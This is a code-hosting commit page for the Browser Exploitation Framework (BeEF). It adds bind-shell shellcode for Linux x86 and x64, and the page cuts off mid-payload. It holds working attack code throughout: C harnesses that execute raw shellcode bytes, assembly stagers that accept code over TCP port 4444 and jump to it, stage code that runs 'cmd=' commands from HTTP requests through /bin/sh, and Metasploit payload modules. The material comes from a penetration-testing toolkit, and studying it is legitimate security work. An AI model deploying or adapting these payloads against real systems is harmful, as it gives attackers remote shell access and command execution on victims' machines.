Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #933 from bmantra/master

Browse Source 
initial commit of the beef bind shellcode
This commit is contained in:
bmantra
2013-09-28 12:18:21 -07:00
parent 5980eff047 fa95ac5b55
commit a1f102b869
25 changed files with 2019 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

27
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/socket64.c Executable file
View File

@@ -0,0 +1,27 @@
/**
Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
The C-skeleton to compile and test this shellcode is used with kind permission of Vivek Ramachandran. A standalone version can be compiled with:
#gcc -fno-stack-protector -z execstack -o socket64 socket64.c
**/
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
char shellcode[] = "\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48\x01\xc6\xff\xe6";
int main(int argc, char **argv) {
char *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {perror("mmap");exit(-1);}
memcpy(ptr, shellcode, sizeof(shellcode));
sc = (int(*)())ptr;
(void)((void(*)())ptr)();
printf("\n");
return 0;
}

285
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stage64.nasm Executable file
View File

@@ -0,0 +1,285 @@
BITS 64
SECTION .text
global _start
_start:
cld ;clear direction flag
xor rdx,rdx ;zero rdx
push BYTE 0x02
pop r14
;create two pipes
createpipes:
push rdx ;allocate space on the stack
mov rdi, rsp ;point to the stack
push BYTE 0x16
pop rax ;sys_pipe
syscall
dec r14
test r14, r14 ;create 2 pipes
je endcreatepipes
jmp createpipes
endcreatepipes:
;sys_fork
push BYTE 0x39
pop rax
syscall
cmp eax, 0x00 ;parent or child?
je child
xor rdi, rdi ; zero rdi
mov edi, DWORD [rsp+0x8] ; close read end of one pipe
push BYTE 0x03
pop rax ;sys_close
syscall
mov edi, DWORD [rsp+0x4] ;close write end of the other pipe
push BYTE 0x03
pop rax ;sys_close
syscall
;make non-blocking
mov edi, DWORD [rsp] ;fd
push BYTE 0x04
pop rsi ;F_SETFL
xor rdx, rdx
mov rdx, 0x800 ;O_NONBLOCK
push BYTE 0x48
pop rax ; sys_fcntl
syscall
;allocate one page of memory
xor rdi,rdi ;system determines location
push 0x1000 ;allocated size
pop rsi
push BYTE 0x07
pop rdx ;PROT_READ | PROT_WRITE | PROT_EXEC
push BYTE 0x22
pop r10 ; MAP_ANONYMOUS | MAP_PRIVATE
push rdi
push rdi
pop r9 ;offset
pop r8 ;fd
push BYTE 0x09
pop rax
syscall
mov r14, rax ;save pointer allocated memory for later use
doforever:
;initialize socket
xor rdx, rdx ;zero rdx (proto =0)
push BYTE 0x01
pop rsi ;SOCK_STREAM
push BYTE 0x02
pop rdi ;AF_INET = 2
push BYTE 0x29
pop rax ;sys_socket
syscall
mov rbx, rax ; save socket filediscriptor
;reuse socket
push 0x01 ;true
mov r10, rsp ;ptr to optval
push BYTE 0x08
pop r8 ;sizeof socklen_t
push BYTE 0x02
pop rdx ;SO_REUSEADDR = 2
push BYTE 0x01
pop rsi ;SOL_SOCKET = 1
mov rdi, rbx ;socketfd
push BYTE 0x36 ;sys_setsockopt
pop rax
syscall
pop rax ;clean stack
;bind socket to port
xor rax,rax
push BYTE 0x10
pop rdx ;addrlen
push rax
push rax
mov DWORD [rsp], 0x5C110002 ;PORT 0x115c = 4444
mov rsi, rsp ;ptr to sokaddr
mov rdi, rbx ;socketfd
push BYTE 0x31
pop rax ;sys_bind
syscall
pop rax ;clean stack
pop rax
;listen
xor rsi, rsi ;backlog ptr = NULL
mov rdi, rbx ;socketfd
push BYTE 0x32
pop rax ;sys_listen
syscall
;accept
xor rdx,rdx ;addrlen ptr = NULL
xor rsi,rsi ;sockaddr ptr = NULL
mov rdi, rbx ;socketfd
push BYTE 0x2b
pop rax ;sys_accept
syscall
mov r15, rax ;save client socket fd for later use
;close serversocket
mov rdi, rbx ;close server socket fd
push BYTE 0x03
pop rax ;sys_close
syscall
mov rcx, 0x1000 ;pagesize
firstzeromemory:
;zero out memory
dec rcx
mov rbx, r14
add rbx, rcx
mov BYTE [rbx], 0x00
jrcxz readfromsocket
jmp firstzeromemory
readfromsocket:
xor rdx, rdx
;read into allocated memory
mov rdi, r15 ;client socketfd
mov rsi, r14 ;ptr to allocated memory
mov dx, 0x400 ;read 1024 bytes
push BYTE 0x00
pop rax ;sys_read
syscall
mov rcx, 0x400 ;search in 1024 bytes
mov rbx, r14 ;ptr to allocated memory
search:
cmp DWORD[rbx], 0x3d646d63 ;compare with "cmd="
je found ;cmd= found
inc rbx
dec rcx
jrcxz notfound ;cmd= not in recieved buffer
jmp search ;search some more
found:
xor rdi, rdi
mov rcx, rbx
add rcx, 0x03 ;skip "cmd"
mov rsi, rcx
mov edi, DWORD [rsp+0xC] ;write to pipe
sendcommand:
inc rsi ;first time skip "=", move to next byte
push BYTE 0x01
pop rdx ;write one byte
push BYTE 0x01
pop rax ;sys_write
syscall
cmp BYTE [rsi], 0x0a ;LF character?
jne sendcommand ;else continue write to pipe
;sleep one second
push BYTE 0x23
pop rax ;sys_nanosleep
push DWORD 0x00
push DWORD 0x01 ;one second
mov rdi, rsp ;ptr to argument array
xor rsi, rsi ;NULL
syscall
pop rax ;clean stack
pop rax
notfound:
call writehttpheaders
db 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20,0x32,0x30,0x30,0x20,0x4f,0x4b,0x0d,0x0a
db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x0d,0x0a
db 0x41,0x63,0x63,0x65,0x73,0x73,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x2d,0x41,0x6c,0x6c,0x6f,0x77,0x2d,0x4f,0x72,0x69,0x67,0x69,0x6e,0x3a,0x20,0x2a,0x0d,0x0a
db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x33,0x30,0x34,0x38,0x0d,0x0a,0x0d,0x0a
writehttpheaders:
pop rsi ;source address saved by call
mov rdi, r14 ;ptr to allocated memory
add rdi, 0x400 ;skip 1024 bytes
mov rcx, 0x62 ;copy 98 bytes
rep movsb
xor rdi, rdi ;zero rdi
mov edi, DWORD [rsp] ;read from pipe
mov rsi, r14 ;ptr to allocated memory
add rsi, 0x400 ;skip 1024 bytes
add rsi, 0x62 ;skip header
mov rdx, 0xb86 ;read max 2950 bytes
xor rax,rax ;sys_read
syscall
mov rdi, r15 ;clientsocket fd
mov rsi, r14 ;ptr to allocated memory
add rsi, 0x400 ;skip 1024 first bytes
mov rdx, 0xbe8 ;send max 3048 bytes
push BYTE 0x01
pop rax ;sys_write
syscall
mov rdi, r15 ;close clientsocket fd
push BYTE 0x03
pop rax ;sys_close
syscall
jmp doforever
child:
xor rdi, rdi
mov edi, DWORD [rsp+0xc] ;close output side of pipe
push BYTE 0x03
pop rax ;sys_close
syscall
xor rdi, rdi ;close stdin
push BYTE 0x03
pop rax ;sys_close
syscall
mov edi, DWORD [rsp+0x08] ;dup input side to stdin
push BYTE 0x20
pop rax ;sys_dup
syscall
mov edi, DWORD [rsp] ;close input side of other pipe
push BYTE 0x03
pop rax ;sys_close
syscall
xor rdi, rdi
inc rdi ;close stdout
push BYTE 0x03
pop rax ;sys_close
syscall
mov edi, DWORD [rsp+0x4] ;dup output side to stdout
push BYTE 0x20
pop rax ;sys_dup
syscall
;setresuid(0,0,0)
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx
push BYTE 0x75
pop rax ;sys_resuid
syscall
push BYTE 0x3b
pop rax ;sys_execve
mov rdi, 0x0068732f6e69622f ;/bin/shNULL
push rdi ;push to stack
mov rdi, rsp ;ptr to stack
xor rsi, rsi ;NULL
xor rdx, rdx ;NULL
syscall

106
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stager64.nasm Executable file
View File

@@ -0,0 +1,106 @@
BITS 64
SECTION .text
global _start
_start:
cld ;clear direction flag
xor rdx, rdx ;zero rdx (proto=0)
push BYTE 0x01
pop rsi ;SOCK_STREAM
push BYTE 0x02
pop rdi ;AF_INET = 2
push BYTE 0x29
pop rax ;sys_socket
syscall
mov rbx, rax ; save socket filediscriptor
;reuse socket
push 0x01 ;true
mov r10, rsp ;ptr to optval
push BYTE 0x08
pop r8 ;sizeof socklen_t
push BYTE 0x02
pop rdx ;SO_REUSEADDR = 2
push BYTE 0x01
pop rsi ;SOL_SOCKET = 1
mov rdi, rbx ;socketfd
push BYTE 0x36 ;sys_setsockopt
pop rax
syscall
xor rax,rax
push BYTE 0x10
pop rdx ;addrlen
push rax
push rax
mov DWORD [rsp], 0x5c110002 ;PORT 0x115c = 4444
mov rsi, rsp ;ptr to sokaddr
mov rdi, rbx ;socketfd
push BYTE 0x31
pop rax ;sys_bind
syscall
xor rsi, rsi ;backlog ptr = NULL
mov rdi, rbx ;socketfd
push BYTE 0x32
pop rax ;sys_listen
syscall
;accept
xor rdx,rdx ;addrlen ptr = NULL
xor rsi,rsi ;sockaddr ptr = NULL
mov rdi, rbx ;socketfd
push BYTE 0x2B
pop rax ;sys_accept
syscall
mov r15, rax ;save client socket fd for later use
mov rdi, rbx ;close server socket fd
push BYTE 0x03
pop rax ;sys_close
syscall
;allocate memory
xor rdi,rdi ;system determines location
push 0x1000 ;allocated size
pop rsi
push BYTE 0x07
pop rdx ;PROT_READ | PROT_WRITE | PROT_EXEC
push BYTE 0x22
pop r10 ; MAP_ANONYMOUS | MAP_PRIVATE
push rdi
push rdi
pop r9 ;offset
pop r8 ;fd
push BYTE 0x09
pop rax
syscall
mov r14, rax ;save pointer allocated memory for later use
;read into allocated memory
mov rdi, r15 ;client socketfd
mov rsi, r14 ;ptr to allocated memory
mov dx, 0x1000 ;read one page of memory
push BYTE 0x00
pop rax ;sys_read
syscall
;close clientsocketfd
mov rdi, r15 ;client socketfd
push BYTE 0x03
pop rax ;sys_close
syscall
mov rsi, r14 ;ptr to allocated memory
search:
cmp DWORD [rsi], 0x3d646d63 ;compare with "cmd="
je short found ;cmd= found
inc rsi
jmp short search ;search some more
found:
push BYTE 0x04 ;skip "cmd="
pop rax
add rsi, rax
jmp rsi ;jump to stage

27
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/socket.c Normal file
View File

@@ -0,0 +1,27 @@
/**
Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
The C-skeleton to compile and test this shellcode is used with kind permission of Vivek Ramachandran. A standalone version can be compiled with:
#gcc -m32 -fno-stack-protector -z execstack -o socket socket.c
**/
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
char shellcode[] = "\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7";
int main(int argc, char **argv) {
char *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {perror("mmap");exit(-1);}
memcpy(ptr, shellcode, sizeof(shellcode));
sc = (int(*)())ptr;
(void)((void(*)())ptr)();
printf("\n");
return 0;
}

290
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stage.nasm Normal file
View File

@@ -0,0 +1,290 @@
; Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
; Browser Exploitation Framework (BeEF) - http://beefproject.com
; See the file 'doc/COPYING' for copying permission
BITS 32
SECTION .text
global _start
_start:
cld ;clear direction flag
xor edx, edx ;zero edx
push BYTE 0x02
pop ecx
;create two pipes
createpipes:
push edx ;allocate space on stack
push edx
mov ebx, esp ; ptr to argument array
push BYTE 0x2A ;sys_pipe
pop eax
int 0x80 ;syscall
dec ecx
jcxz endcreatepipes ;jmp when both pipes are created
jmp short createpipes ;create next pipe
endcreatepipes:
;create fork
xor ebx, ebx ;zero ebx
push BYTE 0x02 ;sys_fork
pop eax
int 0x80 ;syscall
cmp eax, 0x00 ;parent or child
je child
mov ebx, [esp+0x8] ;close read end of one pipe
push BYTE 0x06 ;sys_close
pop eax
int 0x80
mov ebx, [esp+0x4] ;close write end of the other pipe
push BYTE 0x06 ;sys_close
pop eax
int 0x80
; make non blocking
mov ebx, [esp] ;fd
push BYTE 0x04 ;F_SETFL
pop ecx
push 0x800 ;O_NONBLOCK
pop edx
push BYTE 0x37 ;sys_fcntl
pop eax
int 0x80
;allocate one page of memory
push BYTE 0x00 ;offset = 0
push 0xffffffff ;fd=-1
push BYTE 0x22 ;MAP_ANONYMOUS | MAP_PRIVATE
push BYTE 0x07 ;PROT_READ | PROT_WRITE | PROT_EXEC
push 0x1000 ;allocated size
push 0x00 ;system determines location
mov ebx, esp ;ptr to argument array
push BYTE 0x5a
pop eax
int 0x80
mov edi, eax ;ptr to allocated memory
add esp, 0x18
doforever:
xor edx, edx
xor eax, eax
;initialize socket
push BYTE 0x01
pop ebx ;SYS_SOCKET
push eax ;proto = 0
inc eax
push eax ;SOCK_STREAM = 1
inc eax
push eax ;AF_INET = 2
mov ecx, esp ;ptr to argument array
push BYTE 0x66
pop eax ;socketcall is syscall #102
int 0x80
mov esi, eax ; save socket filedescriptor
add esp, 0x0C
;reuse socket
push BYTE 0x0E
pop ebx ;SYS_SETSOCKOPT
push BYTE 0x04 ;sizeof socklen_t
push esp ;address of socklen_t
push BYTE 0x02 ;SO_REUSEADDR = 2
push BYTE 0x01 ;SOL_SOCKET = 1
push esi ;socket fd
mov ecx, esp ;ptr to argument array
push BYTE 0x66
pop eax ;socketcall is syscall #102
int 0x80
add esp, 0x14
;bind socket to port
push BYTE 0x02
pop ebx ;SYS_BIND
push edx ;INADDR_ANY
push 0x5c110002 ;PORT 0x115c = 4444
mov ecx, esp ;ptr to server struct
push BYTE 0x10 ; addrlen
push ecx
push esi ;socketfd
mov ecx, esp ;ptr to argument array
push BYTE 0x66
pop eax ;socketcall is syscall #102
int 0x80
add esp, 0x14
inc ebx
inc ebx ;SYS_LISTEN
push ebx ;backlog
push esi ;socketfd
mov ecx, esp ;ptr to argument array
push BYTE 0x66
pop eax ; socketcall is syscall #102
int 0x80
add esp, 0x08
inc ebx ;SYS_ACCEPT
push edx ;socklen = 0
push edx ;sockaddr ptr = NULL
push esi ;sockfd
mov ecx, esp ;ptr to argumet array
push BYTE 0x66
pop eax ;socketcall is syscall #102
int 0x80
add esp, 0x0c
xchg esi, eax ;serversocket in eax and clientsocket handler in esi
xchg eax, ebx ;serversocket in ebx
mov eax, 0x06 ;close serversocket
int 0x80
mov ecx, 0x1000
firstzeromemory:
;zero out memory
dec ecx
mov ebx, edi
add ebx, ecx
mov BYTE [ebx], 0x00
jecxz readfromsocket
jmp firstzeromemory
readfromsocket:
;read from socket into memory
mov dx, 0x400 ;read 1024 bytes
mov ecx, edi ;ptr to allocated memory
mov ebx, esi ;clientsocket
push BYTE 0x03
pop eax ;sys_read
int 0x80
push edi ;ptr to allocate memory
push esi ;clientsocket
mov ebx, edi ;ptr to allocated memory
mov ecx, 0x400 ;search in 1024 bytes
search:
cmp DWORD [ebx], 0x3d646D63 ;compare with "cmd="
je found ;cmd= found
inc ebx
dec ecx
jecxz notfound ;cmd= not in recieved buffer
jmp search ;search some more
found:
mov ecx, ebx ;put ptr to memory where "cmd=" was found
add ecx, 0x03 ;skip "cmd"
mov ebx, [esp+0x14] ;write to pipe
sendcommand:
inc ecx ;first time skip "=", move to next byte
push BYTE 0x01 ;write one byte
pop edx
push BYTE 0x04 ;sys_write
pop eax
int 0x80
cmp BYTE [ecx], 0x0a ;LF character?
jne sendcommand ;else continue write to pipe
;sleep one second
push 0x00
push 0x01 ;one second
mov ebx, esp ;ptr to argument array
xor ecx, ecx ;NULL
mov eax, 0xA2 ;sys_nanosleep
int 0x80
add esp, 0x08 ;clean up stack
notfound:
call writehttpheaders
db 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20,0x32,0x30,0x30,0x20,0x4f,0x4b,0x0d,0x0a ;HTTP/1.1 200 OK
db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x0d,0x0a ;Content-Type: text/html
db 0x41,0x63,0x63,0x65,0x73,0x73,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x2d,0x41,0x6c,0x6c,0x6f,0x77,0x2d,0x4f,0x72,0x69,0x67,0x69,0x6e,0x3a,0x20,0x2a,0x0d,0x0a ;Access-Control-Allow-Origin: *
db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x33,0x30,0x34,0x38,0x0d,0x0a,0x0d,0x0a ;Content-Length: 3048
writehttpheaders:
pop esi ;source address saved by call
add edi, 0x400 ;ptr to memory skip 1024 bytes
mov ecx, 0x62 ;copy 98 bytes
rep movsb
pop edi ;restore clientsocket
pop esi ;restore ptr to memory
mov ebx, [esp] ;read from pipe
mov ecx, esi ;ptr to memory
add ecx, 0x400 ;skip 1024 bytes
add ecx, 0x62 ;skip header
push 0xB86 ;read max 2950 bytes
pop edx
push BYTE 0x03 ;sys_read
pop eax
int 0x80
mov ebx, edi ;clientsocket
mov ecx, esi ;ptr to memory
add ecx, 0x400 ;skip 1024 first bytes
mov edx, 0xbe8 ;send max 3048 bytes
push BYTE 0x04 ;sys_write
pop eax
int 0x80
;close clientsocket
push BYTE 0x06 ;sys_close
pop eax
int 0x80
mov edi, esi ;restore memory ptr into edi
jmp doforever
child:
mov ebx, [esp+0xC] ;close output side of pipe
push BYTE 0x06 ;sys_close
pop eax
int 0x80
xor ebx, ebx ;close stdin
push BYTE 0x06 ;sys_close
pop eax
int 0x80
mov ebx, [esp+0x8] ;dup input side to stdin
push BYTE 0x29 ;sys_dup
pop eax
int 0x80
mov ebx, [esp] ;close input side of other pipe
push BYTE 0x06
pop eax
int 0x80
xor ebx, ebx
inc ebx ;close stdout
push BYTE 0x06 ;sys_close
pop eax
int 0x80
mov ebx, [esp+0x4] ;dup output side to stdout
push BYTE 0x29 ;sys_dup
pop eax
int 0x80
;setresuid(0,0,0)
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov al, 0xa4 ;sys_setresuid16
int 0x80
;execve("/bin//sh", 0, 0)
xor eax, eax
push eax
push eax
push 0x68732f2f ;//sh
push 0x6e69622f ;/bin
mov ebx, esp
push BYTE 0x0b ;sys_execve
pop eax
int 0x80

111
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stager.nasm Normal file
View File

@@ -0,0 +1,111 @@
; Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
; Browser Exploitation Framework (BeEF) - http://beefproject.com
; See the file 'doc/COPYING' for copying permission
BITS 32
SECTION .text
global _start
_start:
cld ;clear direction flag
xor eax, eax ;zero eax
xor edx, edx ;zero edx
;initialize socket
push BYTE 0x01
pop ebx ;SYS_SOCKET
push eax ; proto = 0
inc eax
push eax ;SOCK_STREAM = 1
inc eax
push eax ;AF_INET = 2
mov ecx, esp ; ptr to argument array
push BYTE 0x66
pop eax ;socketcall is syscall #102
int 0x80
mov esi, eax ;save socket filediscriptor
push BYTE 0x0E
pop ebx ;SYS_SETSOCKOPT
push BYTE 0x04 ;sizeof socklen_t
push esp ; address of socklen_t
push BYTE 0x02 ;SO_REUSEADDR = 2
push BYTE 0x01 ;SOL_SOCKET = 1
push esi ;socket fd
mov ecx, esp ;ptr to argument array
push BYTE 0x66
pop eax ; socketcall is syscall #102
int 0x80
;bind socket to port
push BYTE 0x02
pop ebx ;SYS_BIND
push edx ;INADDR_ANY
push 0x5c110002 ;PORT 0x115C = 4444
mov ecx, esp ;server struct
push BYTE 0x10 ;addrlen
push ecx
push esi ;socketfd
mov ecx, esp ; ptr to argument array
push BYTE 0x66
pop eax ;socketcall is syscall #102
int 0x80
inc ebx
inc ebx ;SYS_LISTEN
push ebx ;backlog
push esi ;socketfd
mov ecx, esp ;ptr to argument array
push BYTE 0x66
pop eax ;socketcall is syscall #102
int 0x80
inc ebx ;SYS_ACCEPT
push edx ;socklen = 0
push edx ;sockaddr ptr = NULL
push esi ;socketfd
mov ecx, esp ; ptr to argument array
push BYTE 0x66
pop eax ;socketcall is syscall #102
int 0x80
xchg esi, eax ;serversocket in eax and client socket handler into esi
xchg eax, ebx ;serversocket in ebx
mov eax, 0x6 ;close serversocket
int 0x80
push BYTE 0x00 ;offset =0
push 0xFFFFFFFF ;fd = -1
push BYTE 0x22 ;MAP_ANONYMOUS | MAP_PRIVATE
push BYTE 0x07 ;PROT_READ | PROT_WRITE | PROT_EXEC
push 0x1000 ;allocated size
push BYTE 0x00 ;system determines location
mov ebx, esp ;ptr tot argument array
push BYTE 0x5a
pop eax ;MMAP call
int 0x80
mov edi, eax ;ptr to allocated memory
; read from socket into memory
mov dx, 0x1000 ;max bytes to read
mov ecx, edi ;pointer to memory
mov ebx, esi ;clientsocket
push BYTE 0x03
pop eax
int 0x80
push BYTE 0x06
pop eax ;close clientsocket
int 0x80
search:
cmp DWORD [edi], 0x3d646d63 ;compare with "cmd="
je short found ;jump if found
inc edi ;look some further
jmp short search
found:
push BYTE 0x04
pop eax
add edi, eax ;skip "cmd="
jmp edi ;jump to the staged shellcode

73
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-handler.rb Normal file
View File

@@ -0,0 +1,73 @@
##
# $Id: beef_bind-handler.rb 121018 Ty Miller @ Threat Intelligence$
##
module Msf
module Handler
###
#
# This module implements the Bind TCP handler placeholder only.
#
###
module BeEFBind
include Msf::Handler
#
# Returns the handler specific string representation
#
def self.handler_type
return "beef_bind"
end
#
# Returns the connection oriented general handler type
#
def self.general_handler_type
"bind"
end
#
# Initializes a bind handler and adds the options common to all bind
# payloads, such as local port.
#
def initialize(info = {})
super
register_options(
[
Opt::LPORT(4444),
#OptAddress.new('RHOST', [false, 'The target address', '']),
], Msf::Handler::BeEFBind)
end
#
# Placeholder only
#
def cleanup_handler
end
#
# Placeholder only
#
def add_handler(opts={})
# Start a new handler
start_handler
end
#
# Placeholder only
#
def start_handler
end
#
# Placeholder only
#
def stop_handler
end
end
end
end

85
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x64.rb Normal file
View File

@@ -0,0 +1,85 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Linux Command Shell Stage (stage x64)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Bart Leppens' ],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 165, 'n' ]
},
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x02\x41\x5e\x52\x48\x89\xe7\x6a\x16\x58\x0f" +
"\x05\x49\xff\xce\x4d\x85\xf6\x74\x02\xeb\xed\x6a\x39\x58\x0f\x05" +
"\x83\xf8\x00\x0f\x84\xdd\x01\x00\x00\x48\x31\xff\x8b\x7c\x24\x08" +
"\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x03\x58\x0f\x05\x8b\x3c" +
"\x24\x6a\x04\x5e\x48\x31\xd2\xba\x00\x08\x00\x00\x6a\x48\x58\x0f" +
"\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41" +
"\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x48" +
"\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3" +
"\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48" +
"\x89\xdf\x6a\x36\x58\x0f\x05\x58\x48\x31\xc0\x6a\x10\x5a\x50\x50" +
"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58" +
"\x0f\x05\x58\x58\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48" +
"\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7" +
"\x48\x89\xdf\x6a\x03\x58\x0f\x05\xb9\x00\x10\x00\x00\x48\xff\xc9" +
"\x4c\x89\xf3\x48\x01\xcb\xc6\x03\x00\xe3\x02\xeb\xf0\x48\x31\xd2" +
"\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x04\x6a\x00\x58\x0f\x05\xb9" +
"\x00\x04\x00\x00\x4c\x89\xf3\x81\x3b\x63\x6d\x64\x3d\x74\x0a\x48" +
"\xff\xc3\x48\xff\xc9\xe3\x34\xeb\xee\x48\x31\xff\x48\x89\xd9\x48" +
"\x83\xc1\x03\x48\x89\xce\x8b\x7c\x24\x0c\x48\xff\xc6\x6a\x01\x5a" +
"\x6a\x01\x58\x0f\x05\x80\x3e\x0a\x75\xf0\x6a\x23\x58\x6a\x00\x6a" +
"\x01\x48\x89\xe7\x48\x31\xf6\x0f\x05\x58\x58\xe8\x62\x00\x00\x00" +
"\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d" +
"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74" +
"\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73" +
"\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f" +
"\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" +
"\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a" +
"\x0d\x0a\x5e\x4c\x89\xf7\x48\x81\xc7\x00\x04\x00\x00\xb9\x62\x00" +
"\x00\x00\xf3\xa4\x48\x31\xff\x8b\x3c\x24\x4c\x89\xf6\x48\x81\xc6" +
"\x00\x04\x00\x00\x48\x83\xc6\x62\xba\x86\x0b\x00\x00\x48\x31\xc0" +
"\x0f\x05\x4c\x89\xff\x4c\x89\xf6\x48\x81\xc6\x00\x04\x00\x00\xba" +
"\xe8\x0b\x00\x00\x6a\x01\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f" +
